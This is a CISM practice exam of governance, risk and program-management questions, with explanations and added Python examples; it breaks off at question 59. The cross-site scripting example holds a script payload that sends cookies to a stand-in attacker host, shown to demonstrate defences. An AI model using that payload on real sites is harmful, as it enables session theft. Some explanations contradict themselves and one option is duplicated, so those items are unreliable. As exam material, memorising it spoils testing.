ISACA CISM Sample Examination
Exam Questions by Domain Area
Reference to:
daypo.net ----------- CISM practice test
Domain 1 - Information Security Governance (24%)
1. Which of the following requirements would have the lowest level of priority in information security?
a. Technical
b. Regulatory
c. Privacy
d. Business
Information security priorities may, at times, override technical specifications, which then must be rewritten to conform to minimum security standards. Regulatory and privacy requirements are government-mandated and, therefore, not subject to override. The needs of the business should always take precedence in deciding information security priorities.
-----
2. The PRIMARY goal in developing an information security strategy is to:
a. establish security metrics and performance monitoring.
b. educate business process owners regarding their duties.
c. ensure that legal and regulatory requirements are met.
d. support the business objectives of the organization.
The business objectives of the organization supersede all other factors. Establishing metrics and measuring performance, meeting legal and regulatory requirements, and educating business process owners are all subordinate to this overall goal.
-----
3. Senior management commitment and support for information security can BEST be enhanced through:
a. a formal security policy sponsored by the chief executive officer (CEO).
b. regular security awareness training for employees.
c. periodic review of alignment with business management goals.
d. senior management sign-off on the information security strategy.
Ensuring that security activities continue to be aligned and support business goals is critical to obtaining their support. Although having the chief executive officer (CEO) sign-off on the security policy and senior management sign-off on the security strategy makes for good visibility and demonstrates good tone at the top, it is a one-time discrete event that may be quickly forgotten by senior management. Security awareness training for employees will not have as much effect on senior management commitment.
-----
4. Which of the following MOST commonly falls within the scope of an information security governance steering committee?
a. Interviewing candidates for information security specialist positions.
b. Developing content for security awareness programs.
c. Prioritizing information security initiatives.
d. Approving access to critical financial systems.
Prioritizing information security initiatives is the only appropriate item. The interviewing of specialists should be performed by the information security manager, while the developing of program content should be performed by the information security staff. Approving access to critical financial systems is the responsibility of the individual system data owners.
-----
5. Which of the following is the MOST important factor when designing information security architecture?
a. Technical platform interfaces.
b. Scalability of the network.
c. Development methodologies.
d. Stakeholder requirements.
The most important factor for information security is that it advances the interests of the business, as defined by stakeholder requirements. Interoperability and scalability, as well as development methodologies, are all important but are without merit if a technologically-elegant solution is achieved that does not meet the needs of the business.
-----
6. What will have the HIGHEST impact on standard information security governance models?
a. Number of employees.
b. Distance between physical locations.
c. Complexity of organizational structure.
d. Organizational budget.
Information security governance models are highly dependent on the overall organizational structure. Some of the elements that impact organizational structure are multiple missions and functions across the organization, leadership and lines of communication. Number of employees and distance between physical locations have less impact on information security governance models, since well-defined process, technology and people components combine to provide the proper governance. Organizational budget has little impact once good governance models are in place; rather, governance helps in effective management of the organization's budget.
-----
7. In order to highlight to management the importance of integrating information security in the business processes, a newly hired information security officer should FIRST:
a. prepare a security budget.
b. conduct a risk assessment.
c. develop an information security policy.
d. obtain benchmarking information.
Risk assessment, evaluation and impact analysis will be the starting point for driving management's attention to information security. All other choices will follow the risk assessment.
-----
8. An outcome of effective security governance is:
a. business dependency assessment.
b. risk assessment.
c. strategic alignment.
d. planning.
Business dependency assessment is a process of determining the dependency of a business on certain information resources. It is not an outcome or a product of effective security management. Strategic alignment is an outcome of effective security governance. When there is good governance, there is likely to be strategic alignment. Risk assessment is not an outcome of effective security governance; it is a process. Planning comes at the beginning of effective security governance, and is not an outcome but a process.
-----
9. How would an information security manager balance the potentially conflicting requirements of an international organization's security standards and local regulation?
a. Give organization standards preference over local regulations.
b. Follow local regulations only.
c. Make the organization aware of those standards where local regulations cause conflicts.
d. Negotiate a local version of the organization standards.
Adherence to local regulations must always be the priority. Not following local regulations can prove detrimental to the group organization. Following local regulations only is incorrect since there needs to be some recognition of organization requirements. Making the organization aware of the standards is a sensible step, but is not a total solution. Negotiating a local version of the organization standards is the most effective compromise in this situation.
-----
10. Which of the following should drive the risk analysis for an organization?
a. Senior management.
b. Security manager.
c. Quality manager.
d. Legal department.
Although senior management should support and sponsor a risk analysis, the know-how and the management of the project will be with the security department. Quality management and the legal department will contribute to the project.
-----
11. In implementing information security governance, the information security manager is PRIMARILY responsible for:
a. developing the security strategy.
b. reviewing the security strategy.
c. communicating the security strategy.
d. approving the security strategy.
The information security manager is responsible for developing a security strategy based on business objectives with the help of business process owners. Reviewing the security strategy is the responsibility of a steering committee. The information security manager is not necessarily responsible for communicating or approving the security strategy.
-----
12. An information security strategy document that includes specific links to an organization's business activities is PRIMARILY an indicator of:
a. performance measurement.
b. integration.
c. alignment.
d. value delivery.
Strategic alignment of security with business objectives is a key indicator of performance measurement. In guiding a security program, a meaningful performance measurement will also rely on an understanding of business objectives, which will be an outcome of alignment. Business linkages do not by themselves indicate integration or value delivery. While alignment is an important precondition, it is not as important an indicator.
-----
13. To justify the need to invest in a forensic analysis tool, an information security manager should FIRST:
a. review the functionalities and implementation requirements of the solution.
b. review comparison reports of tool implementation in peer companies.
c. provide examples of situations where such a tool would be useful.
d. demonstrate that the investment meets organizational needs.
Any investment must be reviewed to determine whether it is cost effective and supports the organizational strategy. It is important to review the features and functionalities provided by such a tool, and to provide examples of situations where the tool would be useful, but that comes after substantiating the investment and its return to the organization.
-----
14. The MOST useful way to describe the objectives in the information security strategy is through:
a. attributes and characteristics of the 'desired state'.
b. overall control objectives of the security program.
c. mapping the IT systems to key business processes.
d. calculation of annual loss expectations.
Security strategy will typically cover a wide variety of issues, processes, technologies and outcomes that can best be described by a set of characteristics and attributes that are desired. Control objectives are developed after strategy and policy development. Mapping IT system to key business processes does not address strategy issues. Calculation of annual loss expectations would not describe the objectives in the information security strategy.
-----
15. Which of the following will have the GREATEST impact on a financial enterprise with offices in various countries that is involved in transborder flow of information?
a. Current and future technologies.
b. Evolving data protection regulations.
c. Economizing the costs of network bandwidth.
d. calculation of annual loss expectations.
Information security laws vary from country to country and an enterprise must be aware of and follow the applicable laws from each country. There are regulations from countries mandating the data security requirements, and these generally should be followed wherever the data are flowing between the various offices. The other choices would be considered, but will have less impact compared to regulatory requirements.
-----
16. Strategic alignment is PRIMARILY achieved when services provided by the information security department:
a. closely reflect the requirements of key business stakeholders.
b. closely reflect the desires of the IT executive team.
c. reflect the requirements of industry best practices.
d. are reliable and cost-effective using the latest technologies.
The information security strategic plan should be aligned to the business strategy. Business strategy is the articulation of the desires of the business executive team and the board of directors, who are key stakeholders. IT strategic alignment is achieved when it closely reflects the requirements and desires of these business users. The IT executive team does not necessarily reflect the opinion and requirements of the broader business. Choice C is wrong because industry best practices may not be the right solution for the business. Even if the solution is reliable and cost-effective, if it does not meet the business needs then it is not directed toward business advantage.
-----
17. Who is in the BEST position to implement and monitor a balanced scorecard (BSC) for the information system (IS) security program?
a. Executive management.
b. The chief information security officer (CISO)
c. The director of auditing.
d. The chief information officer (CIO)
An IT BSC demonstrates IT value, facilitates IT governance, and acts as a decision support tool for IT management. The CISO develops, implements and monitors the performance metrics as part of the information security governance framework. It is the role of executive management to provide support to IS management to implement measures to achieve the security objectives. The director of auditing oversees the execution of various audit plans and provides assurance that controls are implemented and operating effectively to support the objectives. The CIO is responsible for the technology governance of the enterprise.
-----
18. Which of the following is the MOST important factor on which to rely to successfully assign cross-organizational responsibility to integrate an information security program?
a. The ease of information security technologies.
b. Open channels of communication.
c. The roles of different job functions.
d. Qualified information security professionals in each department.
Job functions across the organization must be taken into consideration before assigning responsibility within the information security program. The transparency of information security technologies and processes is important at the end-user level to ensure that information security does not reduce the efficiency of existing work practices, encouraging work-arounds or other actions that render controls ineffective. Open channels of communication are important, but do not necessarily lead to assigning responsibility for information security controls to another person. Having qualified information security professionals in each department will not necessarily translate into a willingness to accept information security responsibility.
-----
19. The security responsibility of data custodians in an organization will include:
a. assuming overall protection of information assets.
b. determining data classification levels.
c. implementing security controls in products they install.
d. ensuring security measures are consistent with policy.
Security responsibilities of data custodians within an organization include ensuring that appropriate security measures are maintained and are consistent with organizational policy. Executive management holds overall responsibility for protection of the information assets. Data owners determine data classification levels for information assets so that appropriate levels of controls can be provided to meet the requirements relating to confidentiality, integrity and availability. Implementation of information security in products is the responsibility of the IT developers.
-----
20. Who can BEST approve plans to implement an information security governance framework?
a. Internal auditor.
b. Information security management.
c. Steering committee.
d. Infrastructure management.
Senior management that is part of the security steering committee is in the best position to approve plans to implement an information security governance framework. An internal auditor is secondary to the authority and influence of senior management. Information security management should not have the authority to approve the security governance framework. Infrastructure management will not be in the best position since it focuses more on the technologies than on the business.
-----
21. An organization that has decided to implement a formal information security program should FIRST:
a. invite an external consultant to create the security strategy.
b. allocate budget based on best practices.
c. benchmark similar organizations.
d. define high-level business security requirements.
All four choices are valid steps in the process of implementing a formal information security program; however, defining high-level business security requirements should precede the others because the implementation should be based on those security requirements.
-----
22. Which of the following is a key area of the ISO 27001 framework?
a. Operational risk assessment.
b. Financial crime metrics.
c. Capacity management.
d. Business continuity management.
Operational risk assessment, financial crime metrics and capacity management can complement the information security framework, but only business continuity management is a key component.
-----
23. The MAIN goal of an information security strategic plan is to:
a. develop a risk assessment plan.
b. develop a data protection plan.
c. protect information assets and resources.
d. establish security governance.
The main goal of an information security strategic plan is to protect information assets and resources. Developing a risk assessment plan and a data protection plan, and establishing security governance refer to tools utilized in the security strategic plan that achieve the protection of information assets and resources.
-----
24. Information security policies should:
a. address corporate network vulnerabilities.
b. address the process for communicating a violation.
c. be straightforward and easy to understand.
d. be customized to specific groups and roles.
As high-level statements, information security policies should be straightforward and easy to understand. They are high-level and therefore, do not address network vulnerabilities directly or the process for communicating a violation. As policies, they should provide a uniform message to all groups and user roles.
-----
Domain 2 - Information Risk Management and Compliance (33%)
25. Attackers who exploit cross-site scripting vulnerabilities take advantage of:
a. a lack of proper input validation controls.
b. weak authentication controls in the web application layer.
c. flawed cryptographic secure sockets layer (SSL) implementations and short key lengths.
d. implicit web application trust relationships.
Cross-site scripting attacks succeed because user-supplied input is accepted without proper validation and is later rendered by a victim's browser as script rather than as data. Attackers who exploit weak application authentication controls can gain unauthorized access to applications, and this has little to do with cross-site scripting vulnerabilities. Attackers who exploit flawed cryptographic secure sockets layer (SSL) implementations and short key lengths can sniff network traffic and crack keys to gain unauthorized access to information. This also has little to do with cross-site scripting vulnerabilities. Web application trust relationships do not relate directly to the attack.
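As an added illustration (not part of the ISACA material), the Python below shows the flaw the explanation describes and the two controls that address it: an allowlist input check and context-aware output encoding with the standard-library html module. The attack string and the page fragment are constructed for the example.

```python
import html
import re

# Constructed sample input: a search term an attacker might submit in a URL parameter.
ATTACK_INPUT = '<script>location="https://attacker.example/?c="+document.cookie</script>'

# Allowlist for a search box: letters, digits, spaces and a little punctuation, bounded length.
# This is an input validation control, which is what the correct answer refers to.
_TERM_RE = re.compile(r"^[\w .,'-]{1,100}$")


def validate_term(term: str) -> bool:
    """Return True only if the term matches the allowlist; reject everything else."""
    return bool(_TERM_RE.fullmatch(term))


def render_vulnerable(term: str) -> str:
    """Reflected XSS: the raw input is concatenated into HTML and the browser executes it."""
    return f"<p>Results for: {term}</p>"


def render_safe(term: str) -> str:
    """Output encoding for an HTML text context: '<', '>', '&' and quotes become entities."""
    return f"<p>Results for: {html.escape(term, quote=True)}</p>"


def contains_script_tag(fragment: str) -> bool:
    """Crude check used to demonstrate the difference between the two renderers."""
    return "<script" in fragment.lower()


def handle_search(term: str) -> str:
    """Validate first; if the input is rejected, never render it back at all."""
    if not validate_term(term):
        return "<p>Invalid search term.</p>"
    return render_safe(term)


if __name__ == "__main__":
    print(render_vulnerable(ATTACK_INPUT))   # executable script reaches the browser
    print(render_safe(ATTACK_INPUT))         # entities only; shown as text
    print(handle_search(ATTACK_INPUT))       # rejected by the allowlist
```

Validation and encoding are complementary: the allowlist stops junk at the boundary, while encoding protects whatever is legitimately stored and later displayed (for example a surname containing an apostrophe).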
-----
26. Which of the following would BEST address the risk of data leakage?
a. File backup procedures.
b. Database integrity checks.
c. Acceptable use policies.
d. Incident response procedures.
Acceptable use policies are the best measure for preventing the unauthorized disclosure of confidential information. The other choices do not address confidentiality of information.
-----
27. A company recently developed a breakthrough technology. Since this technology could give this company a significant competitive edge, which of the following would FIRST govern how this information is to be protected?
a. Access control policy
b. Data classification policy
c. Encryption standards.
d. Acceptable use policy.
Data classification policies define the level of protection to be provided for each category of data. Without this mandated ranking of degree of protection, it is difficult to determine what access controls or levels of encryption should be in place. An acceptable use policy is oriented more toward the end user and, therefore, would not specifically address what controls should be in place to adequately protect information.
-----
28. What is the BEST technique to determine which security controls to implement with a limited budget?
a. Risk analysis
b. Annualized loss expectancy (ALE) calculations.
c. Cost-benefit analysis
d. Impact analysis
Cost-benefit analysis is performed to ensure that the cost of a safeguard does not outweigh its benefit and that the best safeguard is provided for the cost of implementation. Risk analysis identifies the risks and suggests appropriate mitigation. The annualized loss expectancy (ALE) is a subset of a cost-benefit analysis. Impact analysis would indicate how much could be lost if a specific threat occurred.
-----
29. A company's mail server allows anonymous file transfer protocol (FTP) access which could be exploited. What process should the information security manager deploy to determine the necessity for remedial action?
a. A penetration test
b. A security baseline review
c. A risk assessment
d. A business impact analysis (BIA)
A risk assessment will identify the business impact of such vulnerability being exploited and is, thus, the correct process. A penetration test or a security baseline review may identify the vulnerability but not the remedy. A business impact analysis (BIA) will more likely identify the impact of the loss of the mail server.
-----
30. Which of the following measures would be MOST effective against insider threats to confidential information?
a. Role-based access control
b. Audit trail monitoring
c. Privacy policy
d. Defense-in-depth
Role-based access control provides access according to business needs; therefore, it reduces unnecessary access rights and enforces accountability. Audit trail monitoring is a detective control, which is 'after the fact.'. Privacy policy is not relevant to this risk. Defense-in-depth primarily focuses on external threats.
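The following is an added example, not part of the original exam material, showing why the explanation calls role-based access control both a limiting and an accountability mechanism: permissions attach to roles, users hold roles, and every decision is recorded so that audit trail monitoring can later find denied attempts. The role, user and permission names are constructed for the example.

```python
# Constructed role model for an accounts-payable system.
ROLE_PERMISSIONS = {
    "ap_clerk":      {"invoice:create", "invoice:read"},
    "ap_supervisor": {"invoice:read", "invoice:approve"},
    "auditor":       {"invoice:read", "audit_log:read"},
}

# Constructed user-to-role assignments. Nobody holds both clerk and supervisor,
# which is how separation of duties is expressed in an RBAC model.
USER_ROLES = {
    "alice": {"ap_clerk"},
    "bob":   {"ap_supervisor"},
    "carol": {"auditor"},
}

# Every decision is appended here; a real system would write to a tamper-evident log.
AUDIT_LOG: list[tuple[str, str, str]] = []


def effective_permissions(user: str) -> set[str]:
    """Union of the permissions of every role the user holds (empty for unknown users)."""
    roles = USER_ROLES.get(user, set())
    return set().union(*(ROLE_PERMISSIONS.get(r, set()) for r in roles))


def is_authorized(user: str, permission: str) -> bool:
    """Preventive control: deny by default, allow only if some role grants the permission."""
    decision = permission in effective_permissions(user)
    AUDIT_LOG.append((user, permission, "ALLOW" if decision else "DENY"))
    return decision


def denied_attempts() -> list[tuple[str, str, str]]:
    """Detective control: the after-the-fact view an audit trail monitor would consume."""
    return [entry for entry in AUDIT_LOG if entry[2] == "DENY"]


if __name__ == "__main__":
    print(is_authorized("alice", "invoice:create"))   # True
    print(is_authorized("alice", "invoice:approve"))  # False: clerk cannot approve
    print(denied_attempts())
```

The clerk who tries to approve an invoice is stopped before the fact by the role check, whereas audit trail monitoring only tells you afterwards that the attempt happened; that ordering is the distinction the explanation draws.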
-----
31. Which of the following is the MAIN reason for performing risk assessment on a continuous basis?
a. Justification of the security budget must be continually made.
b. New vulnerabilities are discovered every day.
c. The risk environment is constantly changing.
d. Management needs to be continually informed about emerging risks.
The risk environment is impacted by factors such as changes in technology, and business strategy. These changes introduce new threats and vulnerabilities to the organization. As a result, risk assessment should be performed continuously. Justification of a budget should never be the main reason for performing a risk assessment. New vulnerabilities should be managed through a patch management process. Informing management about emerging risks is important, but is not the main driver for determining when a risk assessment should be performed.
-----
32. There is a time lag between the time when a security vulnerability is first published, and the time when a patch is delivered. Which of the following should be carried out FIRST to mitigate the risk during this time period?
a. Identify the vulnerable systems and apply compensating controls.
b. Minimize the use of vulnerable systems.
c. Communicate the vulnerability to system users.
d. Update the signatures database of the intrusion detection system (IDS)
The best protection is to identify the vulnerable systems and apply compensating controls until a patch is installed. Minimizing the use of vulnerable systems and communicating the vulnerability to system users could be compensating controls but would not be the first course of action. Choice D does not make clear the timing of when the intrusion detection system (IDS) signature list would be updated to accommodate the vulnerabilities that are not yet publicly known. Therefore, this approach should not always be considered as the first option.
-----
33. Which of the following security activities should be implemented in the change management process to identify key vulnerabilities introduced by changes?
a. Business impact analysis (BIA)
b. Penetration testing
c. Audit and review
d. Threat analysis
Penetration testing focuses on identifying vulnerabilities. None of the other choices would identify vulnerabilities introduced by changes.
-----
34. Which of the following techniques MOST clearly indicates whether specific risk-reduction controls should be implemented?
a. Cost-benefit analysis
b. Penetration testing
c. Frequent risk assessment programs
d. Annual loss expectancy (ALE) calculation
In a cost-benefit analysis, the annual cost of safeguards is compared with the expected cost of loss. This can then be used to justify a specific control measure. Penetration testing may indicate the extent of a weakness but, by itself, will not establish the cost/benefit of a control. Frequent risk assessment programs will certainly establish what risk exists but will not determine the maximum cost of controls. Annual loss expectancy (ALE) is a measure which will contribute to the value of the risk but, alone, will not justify a control.
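The ALE and cost-benefit relationship referred to in questions 28 and 34 is worked through in the added Python example below (not part of the ISACA material). It uses the standard formula ALE = SLE x ARO, computes the residual ALE after a control, and then selects controls under a fixed budget by net benefit. All risk figures, control names and costs are constructed for the example.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Risk:
    name: str
    sle: float   # single loss expectancy, cost of one occurrence
    aro: float   # annualized rate of occurrence

    def ale(self) -> float:
        """Annualized loss expectancy = SLE x ARO."""
        return round(self.sle * self.aro, 2)


@dataclass(frozen=True)
class Control:
    name: str
    annual_cost: float
    sle_reduction: float = 0.0   # fraction by which the control cuts the loss per event
    aro_reduction: float = 0.0   # fraction by which the control cuts the event rate


def residual_ale(risk: Risk, control: Control) -> float:
    """ALE that remains once the control is in place."""
    sle = risk.sle * (1.0 - control.sle_reduction)
    aro = risk.aro * (1.0 - control.aro_reduction)
    return round(sle * aro, 2)


def net_benefit(risk: Risk, control: Control) -> float:
    """Annual loss avoided minus the annual cost of the safeguard."""
    return round(risk.ale() - residual_ale(risk, control) - control.annual_cost, 2)


def select_controls(candidates, budget: float):
    """Greedy selection: only controls with positive net benefit, best benefit-per-dollar first."""
    worthwhile = [(r, c) for r, c in candidates if net_benefit(r, c) > 0]
    worthwhile.sort(key=lambda rc: net_benefit(*rc) / rc[1].annual_cost, reverse=True)
    chosen, spent = [], 0.0
    for risk, control in worthwhile:
        if spent + control.annual_cost <= budget:
            chosen.append(control.name)
            spent += control.annual_cost
    return chosen, spent


# Constructed figures for two risks and four candidate controls.
MAIL_COMPROMISE = Risk("Mail server compromise", sle=200_000, aro=0.25)   # ALE 50,000
LAPTOP_THEFT = Risk("Laptop theft", sle=20_000, aro=2.0)                  # ALE 40,000

GATEWAY_FILTERING = Control("Mail gateway filtering", 15_000, aro_reduction=0.8)
HOT_STANDBY = Control("Hot standby mail server", 45_000, sle_reduction=0.9)
DISK_ENCRYPTION = Control("Full-disk encryption", 8_000, sle_reduction=0.95)
CABLE_LOCKS = Control("Laptop cable locks", 2_000, aro_reduction=0.3)

CANDIDATES = [
    (MAIL_COMPROMISE, GATEWAY_FILTERING),
    (MAIL_COMPROMISE, HOT_STANDBY),
    (LAPTOP_THEFT, DISK_ENCRYPTION),
    (LAPTOP_THEFT, CABLE_LOCKS),
]

if __name__ == "__main__":
    for risk, control in CANDIDATES:
        print(f"{control.name:24s} net benefit {net_benefit(risk, control):>10,.2f}")
    print(select_controls(CANDIDATES, budget=20_000))
```

The hot standby server is instructive: it removes most of the loss but costs exactly what it saves, so its net benefit is zero and it is not selected. That is the point of the explanation: ALE alone says the mail risk is worth 50,000 a year, but only the comparison with the safeguard cost says which control is justified.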
-----
35. An organization has decided to implement additional security controls to treat the risks of a new process. This is an example of:
a. eliminating the risk.
b. transferring the risk.
c. mitigating the risk.
d. accepting the risk.
Risk can never be eliminated entirely. Transferring the risk gives it away such as buying insurance so the insurance company can take the risk. Implementing additional controls is an example of mitigating risk. Doing nothing to mitigate the risk would be an example of accepting risk.
-----
36. Which of the following roles is PRIMARILY responsible for determining the information classification levels for a given information asset?
a. Manager
b. Custodian
c. User
d. Owner
Although the information owner may be in a management position and is also considered a user, the information owner role has the responsibility for determining information classification levels. Management is responsible for higher-level issues such as providing and approving budget, supporting activities, etc. The information custodian is responsible for day-to-day security tasks such as protecting information, backing up information, etc. Users are the lowest level; they use the data. The owner classifies the data.
-----
37. The PRIMARY reason for assigning classes of sensitivity and criticality to information resource is to provide a basis for:
a. determining the scope for inclusion in an information security program.
b. defining the level of access controls.
c. justifying costs for information resources.
d. determining the overall budget of an information security program.
The assigned class of sensitivity and criticality of the information resource determines the level of access controls to be put in place. The assignment of sensitivity and criticality takes place with the information assets that have already been included in the information security program and has only an indirect bearing on the costs to be incurred. The assignment of sensitivity and criticality contributes to, but does not decide, the overall budget of the information security program.
-----
38. An organization is already certified to an international security standard. Which mechanism would BEST help to further align the organization with other data security regulatory requirements as per new business needs?
a. Key performance indicators (KPIs)
b. Business impact analysis (BIA)
c. Gap analysis
d. Technical vulnerability assessment
Gap analysis would help identify the actual gaps between the desired state and the current implementation of information security management. BIA is primarily used for business continuity planning. Technical vulnerability assessment is used for detailed assessment of technical controls, which would come later in the process and would not provide complete information in order to identify gaps.
-----
39. When performing a qualitative risk analysis, which of the following will BEST produce reliable results?
a. Estimated productivity losses
b. Possible scenarios with threats and impacts
c. Value of information assets
d. Vulnerability assessment
Listing all possible scenarios that could occur, along with threats and impacts, will better frame the range of risks and facilitate a more informed discussion and decision. Estimated productivity losses, value of information assets and vulnerability assessments would not be sufficient on their own.
-----
40. Which of the following is the BEST method to ensure the overall effectiveness of a risk management program?
a. User assessments of changes
b. Comparison of the program results with industry standards.
c. Assignment of risk within the organization
d. Participation by all members of the organization
Effective risk management requires participation, support and acceptance by all applicable members of the organization, beginning with the executive levels. Personnel must understand their responsibilities and be trained on how to fulfill their roles.
-----
41. The MOST effective use of a risk register is to:
a. identify risks and assign roles and responsibilities for mitigation.
b. identify threats and probabilities.
c. facilitate a thorough review of all IT-related risks on a periodic basis.
d. record the annualized financial amount of expected losses due to risks.
A risk register is more than a simple list--it should be used as a tool to ensure comprehensive documentation, periodic review and formal update of all risk elements in the enterprise's IT and related organization. Identifying risk and assigning roles and responsibilities for mitigation are elements of the register. Identifying threats and probabilities are two elements that are defined in the risk matrix, as differentiated from the broader scope of content in, and purpose for, the risk register. While the annualized loss expectancy (ALE) should be included in the register, this quantification is only a single element in the overall risk analysis program.
-----
42. Logging is an example of which type of defense against systems compromise?
a. Containment
b. Detection
c. Reaction
d. Recovery
Detection defenses include logging as well as monitoring, measuring, auditing, detecting viruses and intrusion. Examples of containment defenses are awareness, training and physical security defenses. Examples of reaction defenses are incident response, policy and procedure change, and control enhancement. Examples of recovery defenses are backups and restorations, failover and remote sites, and business continuity plans and disaster recovery plans.
-----
43. Which of the following is the MOST important to keep in mind when assessing the value of information?
a. The potential financial loss
b. The cost of recreating the information
c. The cost of insurance coverage
d. Regulatory requirement
The potential for financial loss is always a key factor when assessing the value of information. Choices B, C and D may be contributors, but not the key factor.
-----
44. When a proposed system change violates an existing security standard, the conflict would be BEST resolved by:
a. calculating the risk
b. enforcing the security standard.
c. redesigning the system change.
d. implementing mitigating controls.
Decisions regarding security should always weigh the potential loss from a risk against the existing controls. Each situation is unique; therefore, it is not advisable to always decide in favor of enforcing a standard. Redesigning the proposed change might not always be the best option because it might not meet the business needs. Implementing additional controls might be an option, but this would be done after the risk is known.
-----
45. The information classification scheme should:
a. consider possible impact of a security breach.
b. classify personal information in electronic form.
c. be performed by the information security manager.
d. classify systems according to the data processed.
Data classification is determined by the business risk, i.e., the potential impact on the business of the loss, corruption or disclosure of information. It must be applied to information in all forms, both electronic and physical (paper), and should be applied by the data owner, not the security manager. Choice B is an incomplete answer because it addresses only privacy issues, while choice A is a more complete response. Systems are not classified per se, but the data they process and store should definitely be classified.
-----
46. Which of the following is the BEST method to provide a new user with their initial password for e-mail system access?
a. Interoffice a system-generated complex password with 30 days expiration.
b. Provide a temporary password over the telephone set for immediate expiration.
c. Require no password but force the user to set their own in 10 days.
d. Set initial password equal to the user ID with expiration in 30 days.
Documenting the password on paper is not the best method even if sent through interoffice mail--if the password is complex and difficult to memorize, the user will likely keep the printed password and this creates a security concern. A temporary password that will need to be changed upon first logon is the best method because it is reset immediately and replaced with the user's choice of password, which will make it easier for the user to remember. If it is given to the wrong person, the legitimate user will likely notify security if still unable to access the system, so the security risk is low. Setting an account with no initial password is a security concern even if it is just for a few days. Choice D provides the greatest security threat because user IDs are typically known by both users and security staff, thus compromising access for up to 30 days.
-----
47. An operating system (OS) noncritical patch to enhance system security cannot be applied because a critical application is not compatible with the change. Which of the following is the BEST solution?
a. Rewrite the application to conform to the upgrade operating system.
b. Compensate for not installing the patch with mitigating controls.
c. Alter the patch to allow the application to run in a privileged state.
d. Run the application on a test platform; turn production to allow patch and application.
Since the operating system (OS) patch will adversely impact a critical application, a mitigating control should be identified that will provide an equivalent level of security. Since the application is critical, the patch should not be applied without regard for the application; business requirements must be considered. Altering the OS patch to allow the application to run in a privileged state may create new security weaknesses. Finally, running a production application on a test platform is not an acceptable alternative since it will mean running a critical production application on a platform not subject to the same level of security controls.
-----
48. Primary direction on the impact of compliance with new regulatory requirements that may lead to major application system changes should be obtained from the:
a. corporate internal auditor.
b. system developers/analysts.
c. key business process owners.
d. corporate legal counsel.
Business process owners are in the best position to understand how new regulatory requirements may affect their systems. Legal counsel and infrastructure management, as well as internal auditors, would not be in as good a position to fully understand all ramifications.
-----
49. The IT function has declared that, when putting a new application into production, it is not necessary to update the business impact analysis (BIA) because it does not produce modifications in the business processes. The information security manager should:
a. verify the decision with the business units.
b. check the system's risk analysis.
c. recommend update after postimplementation review.
d. request an audit review.
Verifying the decision with the business units is the correct answer because it is not the IT function's responsibility to decide whether a new application modifies business processes. Choice B does not consider the change in the applications. Choices C and D delay the update.
-----
50. An internal review of a web-based application system finds the ability to gain access to all employees' accounts by changing the employee's ID on the URL used for accessing the account. The vulnerability identified is:
a. broken authentication
b. unvalidated input
c. cross-site scripting
d. structured query language (SQL) injection
The authentication process is broken because, although the session is valid, the application should reauthenticate when the input parameters are changed. The review provided valid employee IDs, and valid input was processed. The problem here is the lack of reauthentication when the input parameters are changed. Cross-site scripting is not the problem in this case since the attack is not transferred to any other user's browser to obtain the output. Structured query language (SQL) injection is not a problem since input is provided as a valid employee ID and no SQL queries are injected to provide the output.
-----
51. What is the MOST cost-effective method of identifying new vendor vulnerabilities?
a. External vulnerability reporting sources
b. Periodic vulnerability assessments performed by consultants
c. Intrusion prevention software
d. Honeypots located in the DMZ
External vulnerability sources are going to be the most cost-effective method of identifying these vulnerabilities. The cost involved in choices B and C would be much higher, especially if performed at regular intervals. Honeypots would not identify all vendor vulnerabilities. In addition, honeypots located in the DMZ can create a security risk if the production network is not well protected from traffic from compromised honeypots.
-----
52. Of the following, retention of business records should be PRIMARILY based on:
a. periodic vulnerability assessment.
b. regulatory and legal requirements.
c. device storage capacity and longevity.
d. past litigation.
Retention of business records is a business requirement that must consider regulatory and legal requirements based on geographic location and industry. Choices A and C are important elements for making the decision, but the primary driver is the legal and regulatory requirements that need to be followed by all companies. Record retention may take into consideration past litigation, but it should not be the primary decision factor.
-----
53. Which is the BEST way to measure and prioritize aggregate risk deriving from a chain of linked system vulnerabilities?
a. Vulnerability scans
b. Penetration tests
c. Code reviews
d. Security audits
A penetration test is normally the only security assessment that can link vulnerabilities together by exploiting them sequentially. This gives a good measurement and prioritization of risks. Other security assessments such as vulnerability scans, code reviews and security audits can help give an extensive and thorough risk and vulnerability overview, but will not be able to test or demonstrate the final consequence of having several vulnerabilities linked together. Penetration testing can give risk a new perspective and prioritize based on the end result of a sequence of security problems.
-----
54. Determining the nature and extent of activities required in developing or improving an information security program often requires assessing the existing security level of various program components. The BEST process to accomplish this task is to perform a(n):
a. impact assessment.
b. vulnerability assessment.
c. gap analysis
d. threat assessment.
A gap analysis is used to determine the current state of security for various program components as compared to the desired state. Once the gaps have been determined, action items to improve various aspects of the program should be prioritized using a risk-based approach. An impact assessment is used to determine potential impact in the event of loss of a resource. Vulnerability is only one aspect to be considered in a security review. A threat assessment would not normally be a part of a security review.
-----
55. The design and implementation of controls and countermeasures must be PRIMARILY focused on:
a. eliminating IT risk.
b. cost-benefit balance
c. resource management
d. the number of assets protected
The balance between cost and benefits should direct controls selection. The focus must include procedural, operational and other risks, in addition to IT risk. Resource management is not directly related to controls. The implementation of controls is based on the impact and risk, not on the number of assets.
-----
56. The PRIMARY purpose of performing an internal attack and penetration test is to identify:
a. weaknesses in network and server security.
b. ways to improve the incident response process.
c. potential attack vectors on the network perimeter.
d. the optimum response to internal hacker attacks.
An internal attack and penetration test is designed to identify weaknesses in network and server security. It does not focus as much on incident response or the network perimeter.
-----
57. An organization has learned of a security breach at another company that utilizes similar technology. The FIRST thing the information security manager should do is:
a. assess the likelihood of incidents from the reported cause.
b. discontinue the use of the vulnerable technology.
c. report to senior management that the organization is not affected.
d. remind staff that no similar security breaches have taken place.
The security manager should first assess the likelihood of a similar incident occurring, based on available information. Discontinuing the use of the vulnerable technology would not necessarily be practical since it would likely be needed to support the business. Reporting to senior management that the organization is not affected due to controls already in place would be premature until the information security manager can first assess the impact of the incident. Until this has been researched, it is not certain that no similar security breaches have taken place.
-----
Domain 3 - Information Security Program Development and Management (25%)
58. An intrusion detection system should be placed:
a. outside the firewall
b. on the firewall server
c. on a screened subnet
d. on the external router
An intrusion detection system (IDS) should be placed on a screened subnet, which is a demilitarized zone (DMZ). Placing it on the internet side of the firewall is not advised because the system will generate alerts on all malicious traffic - even though 99 percent will be stopped by the firewall and never reach the internal network. The same would be true of placing it on the external router, if such a thing were feasible. Since firewalls should be installed on hardened servers with minimal services enabled, it would be inappropriate to install the IDS on the same physical device.
-----
59. The BEST reason for an organization to have two discrete firewalls connected directly to the internet and to the same DMZ would be to:
a. provide in-depth defense
b. separate test and production
